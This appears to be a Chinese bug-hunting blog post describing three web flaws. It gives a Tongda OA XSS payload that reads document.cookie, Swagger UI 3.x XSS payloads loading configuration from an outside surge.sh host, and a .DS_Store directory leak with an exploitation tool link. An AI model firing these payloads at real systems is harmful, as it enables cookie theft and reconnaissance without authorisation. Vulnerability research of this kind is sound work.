每日水洞+1(通达OA xss以及swagger xss)
今日edu收获为0,仅收获两xss和一个ds_store文件泄露(不知道收不收)
1.通达oa xss漏洞
漏洞复现:
个人感觉应该是白盒审计出来的吧,应该不是黑盒测试吧,js也没找到该目录泄露
序列 onerror=alert(document.cookie) 尝试注入一个JavaScript事件处理器 onerror,如果在浏览器中执行,它会触发一个警告框来显示 document.cookie 的内容
漏洞利用:
paylod:/module/html_editor/editor/plugins/td_listview/td_listview.php?GZIP_POSTFIX=%22+onerror=alert(document.cookie)+a=1
修复建议:
对输入的数据进行严格的过滤,禁止一切异常字符的传参,修改get传参为post传参
2.swagger xss漏洞
漏洞存在:
一般有百分之九十都有该漏洞,适用于swagger版本在3.xxx
查看swagger版本:
在控制台中输入JSON.stringify(versions)
漏洞利用:
payload:
?configUrl=https://jumpy-floor.surge.sh/test.json
/swagger-ui.html?configUrl=https://jumpy-floor.surge.sh/test.json
/swagger-ui.html?url=https://jumpy-floor.surge.sh/test.json
/swagger-ui.html?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
3.ds_store文件泄露
漏洞成因:
.DS_Store是Mac OS保存文件夹的自定义属性的隐藏文件,由于开发人员在发布代码时未删除文件夹中隐藏的.DS store,可能造成文件目录结构泄漏、源代码文件等敏感信息的泄露。
危害:
在迁移代码时把苹果的隐藏文件DS Store也迁移过去了,导致泄露了目录结构,从而获取到后台管理页面以及数据库文件。
利用:
http://xxx/.DS_Store
漏洞利用工具:
ds_store_exp
下载地址:https://github.com/lijiejie/ds_store_exp

浙公网安备 33010602011771号